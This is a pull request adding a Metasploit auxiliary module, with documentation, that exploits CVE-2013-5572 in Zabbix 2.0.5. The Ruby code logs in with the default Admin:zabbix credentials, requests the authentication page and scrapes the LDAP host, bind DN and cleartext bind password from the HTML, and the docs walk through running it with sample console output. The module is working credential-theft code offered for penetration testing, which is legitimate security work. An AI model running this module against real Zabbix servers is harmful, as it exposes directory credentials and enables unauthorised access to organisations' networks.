### PR TITLE
zabbix module

### DIFF
--- a/documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md
+++ b/documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md
@@ -1,0 +1,40 @@
+
+## Vulnerable Application
+
+  Download [Zabbix 2.0.5](https://sourceforge.net/projects/zabbix/files/ZABBIX%20Latest%20Stable/2.0.5/) from Sourceforge, the main Zabbix site doesn't have a download link.
+  The .iso login is root:zabbix, and the default Zabbix frontend login is Admin:zabbix ([section 2](http://zabbix.com/documentation/2.0/manual/appliance))
+  Configure Zabbix:
+    1. Login to the zabbix web client
+    2. Click Administration, Authentication, select LDAP
+    3. Fill in the fields:
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/admin/http/zabbix_ldap_password_extractor```
+  4. Do: ```set rhost```
+  5. Do: ```run```
+  6. Check out the credentials
+
+## Scenarios
+
+When the values are all blank, but login is success:
+
+```
+resource (zabbix.rc)> use auxiliary/admin/http/zabbix_ldap_password_extractor
+resource (zabbix.rc)> set rhost 192.168.2.245
+rhost => 192.168.2.245
+resource (zabbix.rc)> set verbose true
+verbose => true
+resource (zabbix.rc)> run
+[*] Attempting Login: Admin:zabbix
+[*] Login Success
+[*] No LDAP Host Found
+[*] No LDAP Bind Domain Found
+[*] No LDAP Bind Password Found
+[*] No Login (user) found
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.rb
@@ -19,7 +19,8 @@ class MetasploitModule < Msf::Auxiliary
       'Reference'      =>
         [
           ['CVE', '2013-5572'],
-          ['URL', 'http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html']
+          ['URL', 'http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html'],
+          ['EDB','36157']
         ],
       'DisclosureDate' => 'Sep 30 2013'
     ))

--- a/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.rb
@@ -1,0 +1,127 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zabbix LDAP Password Extractor',
+      'Description'    => %q{
+          Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access
+          and reading the ldap_bind_password value in the HTML source code.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+                           'Pablo Gonzalez', # @pablogonzalezpe, module author
+                           'h00die' # cleanup and submission
+                          ],
+      'Reference'      =>
+        [
+          ['CVE', '2013-5572'],
+          ['URL', 'http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html']
+        ],
+      'DisclosureDate' => 'Sep 30 2013'
+    ))
+
+    register_options([
+      OptString.new('ZABBIXUSER',     [true, 'Username for Zabbix', 'Admin']),
+      OptString.new('ZABBIXPASSWORD', [true, 'Password for Zabbix', 'zabbix']),
+      OptString.new('TARGETURI',      [true, 'Path Zabbix Authentication', '/zabbix/'])
+    ], self.class)
+  end
+
+  def check
+    vprint_status('start of check')
+    res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'index.php')
+      )
+    vprint_status("#{res}")
+    if res && res.body && res.body.to_s =~ /Zabbix 2\.0\.5/
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+  def run
+    cookie = login()
+    if cookie
+      res = send_request_cgi({
+        #'host' => datastore['RHOST'],
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'authentication.php'),
+        'cookie' => cookie,
+        'Content-Type' => 'application/x-www-form-urlencoded'
+        })
+      if res && res.code && res.code == 200
+        ldap_host(res)
+        user_pass_domain(res)
+        user_zabbix(res)
+      else
+        print_error('Request for vulnerable page failed.')
+      end
+    end
+  end
+
+  def login
+    vprint_status("Attempting Login: #{datastore['ZABBIXUSER']}:#{datastore['ZABBIXPASSWORD']}")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'Content-Type' => 'application/x-www-form-urlencoded',
+      'method'       => 'POST',
+      'vars_post'    => {
+        'request'    => '',
+        'name'       => datastore['ZABBIXUSER'],
+        'password'   => datastore['ZABBIXPASSWORD'],
+        'enter'      => 'Sign in'
+      }
+    )
+    if res && res.redirect? #302
+      vprint_status('Login Success')
+      cookie = res.get_cookies
+      return cookie
+    else
+      print_bad('Login Failure')
+      nil
+    end
+  end
+
+  def ldap_host(response)
+    cut = response.body.split("ldap_host\" value=\"")[1]
+    if cut != nil
+      host = cut.split("\"")[0]
+      print_good("LDAP Host: #{host}")
+    else
+      print_status('No LDAP Host Found')
+    end
+  end
+
+  def user_pass_domain(response)
+    cut = response.body.split("ldap_bind_dn\" value=\"")[1]
+    if cut != nil
+      user = cut.split("\"")[0]
+      print_good("LDAP Bind Domain: #{user}")
+    else
+      print_status('No LDAP Bind Domain Found')
+    end
+    cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
+    if cut != nil
+      pass = cut.split("\"")[0]
+      print_good("LDAP Bind Password: #{pass}")
+    else
+      print_status('No LDAP Bind Password Found')
+    end
+  end
+
+  def user_zabbix(response)
+    cut = response.body.split("user\" value=\"")[1]
+    if cut != nil
+      user = cut.split("\"")[0]
+      print_good("Login (user): #{user}")
+    else
+      print_status('No Login (user) found')
+    end
+  end
+end
+

--- a/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.rb
@@ -1,127 +1,86 @@
+##
+# This module requires Metasploit
+# Date: 25-09-2013
+# Author: Pablo González
+# Vendor Homepage: Zabbix -> http://www.zabbix.com 
+# Software Link: http://www.zabbix.com 
+# Version: 2.0.5
+# Tested On: Linux (Ubuntu, Suse, CentOS)
+# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
+# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
+# 	   http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
+# 	   http://seclists.org/fulldisclosure/2013/Sep/151
+#   	   http://www.cvedetails.com/cve/CVE-2013-5572/
+##
+
 require 'msf/core'
 
-class MetasploitModule < Msf::Auxiliary
+class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Zabbix LDAP Password Extractor',
+      'Name'           => 'ldap_bind_password Zabbix CVE-2013-5572',
       'Description'    => %q{
-          Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access
-          and reading the ldap_bind_password value in the HTML source code.
+          Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [
-                           'Pablo Gonzalez', # @pablogonzalezpe, module author
-                           'h00die' # cleanup and submission
-                          ],
-      'Reference'      =>
-        [
-          ['CVE', '2013-5572'],
-          ['URL', 'http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html']
-        ],
-      'DisclosureDate' => 'Sep 30 2013'
+      'Author'         => [ '@pablogonzalezpe, Pablo Gonzalez' ]
     ))
 
     register_options([
-      OptString.new('ZABBIXUSER',     [true, 'Username for Zabbix', 'Admin']),
-      OptString.new('ZABBIXPASSWORD', [true, 'Password for Zabbix', 'zabbix']),
-      OptString.new('TARGETURI',      [true, 'Path Zabbix Authentication', '/zabbix/'])
+      OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
+	  OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
+	  OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
     ], self.class)
-  end
 
-  def check
-    vprint_status('start of check')
-    res = send_request_cgi(
-        'method' => 'GET',
-        'uri'    => normalize_uri(target_uri.path, 'index.php')
-      )
-    vprint_status("#{res}")
-    if res && res.body && res.body.to_s =~ /Zabbix 2\.0\.5/
-      return Exploit::CheckCode::Appears
-    end
-    Exploit::CheckCode::Unknown
   end
 
   def run
-    cookie = login()
-    if cookie
-      res = send_request_cgi({
-        #'host' => datastore['RHOST'],
+    req
+  end
+  def req
+	resp = send_request_cgi(
+      {
+		'host' => datastore['RHOST'],
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'authentication.php'),
-        'cookie' => cookie,
-        'Content-Type' => 'application/x-www-form-urlencoded'
-        })
-      if res && res.code && res.code == 200
-        ldap_host(res)
-        user_pass_domain(res)
-        user_zabbix(res)
-      else
-        print_error('Request for vulnerable page failed.')
-      end
-    end
+        'uri' => normalize_uri(target_uri.path.to_s),
+        'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
+		'content-type' => 'application/x-www-form-urlencoded'
+      }, datastore['TIMEOUT'])
+	    
+	  ldap_host(resp)
+	  user_passDomain(resp)
+	  user_zabbix(resp)
   end
-
-  def login
-    vprint_status("Attempting Login: #{datastore['ZABBIXUSER']}:#{datastore['ZABBIXPASSWORD']}")
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'Content-Type' => 'application/x-www-form-urlencoded',
-      'method'       => 'POST',
-      'vars_post'    => {
-        'request'    => '',
-        'name'       => datastore['ZABBIXUSER'],
-        'password'   => datastore['ZABBIXPASSWORD'],
-        'enter'      => 'Sign in'
-      }
-    )
-    if res && res.redirect? #302
-      vprint_status('Login Success')
-      cookie = res.get_cookies
-      return cookie
-    else
-      print_bad('Login Failure')
-      nil
-    end
-  end
-
+  
   def ldap_host(response)
-    cut = response.body.split("ldap_host\" value=\"")[1]
-    if cut != nil
-      host = cut.split("\"")[0]
-      print_good("LDAP Host: #{host}")
-    else
-      print_status('No LDAP Host Found')
-    end
+	cut = response.body.split("ldap_host\" value=\"")[1]
+	if cut != nil
+		host = cut.split("\"")[0]
+		print_good "LDAP Host => #{host}"
+	end
   end
-
-  def user_pass_domain(response)
-    cut = response.body.split("ldap_bind_dn\" value=\"")[1]
-    if cut != nil
-      user = cut.split("\"")[0]
-      print_good("LDAP Bind Domain: #{user}")
-    else
-      print_status('No LDAP Bind Domain Found')
-    end
-    cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
-    if cut != nil
-      pass = cut.split("\"")[0]
-      print_good("LDAP Bind Password: #{pass}")
-    else
-      print_status('No LDAP Bind Password Found')
-    end
+  
+  def user_passDomain(response)
+	cut = response.body.split("ldap_bind_dn\" value=\"")[1]
+	if cut != nil	
+		user = cut.split("\"")[0]
+		print_good "User Domain? => #{user}"
+	end
+	cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
+	if cut != nil
+		pass = cut.split("\"")[0]
+		print_good "Password Domain? => #{pass}"
+	end
   end
 
   def user_zabbix(response)
-    cut = response.body.split("user\" value=\"")[1]
-    if cut != nil
-      user = cut.split("\"")[0]
-      print_good("Login (user): #{user}")
-    else
-      print_status('No Login (user) found')
-    end
+	cut = response.body.split("user\" value=\"")[1]
+	if cut != nil
+		user = cut.split("\"")[0]
+		print_good "User Zabbix => #{user}"
+	end
   end
 end
-


### PR DESCRIPTION
Part of #7558 .  

For one VERY specific version of Zabbix, the HTML form value's for LDAP were legit.  OOPS.  This was sent to EDB but not msf, so I simply updated it.

Module runs, however I spent a week trying to get linux LDAP to work with it correctly.  I decided instead of sitting on the module longer due to my inability to make LDAP function like a real sys admin, someone here may have better luck.  If you do, i'd appreciate a small writeup, i'll add it to the docs.

## Verification
- [ ] Install and configure app
- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/zabbix_ldap_password_extractor`
- [ ] `set verbose true`
- [ ] `set rhost`
- [ ] **Verify** you get some sweet ldap creds
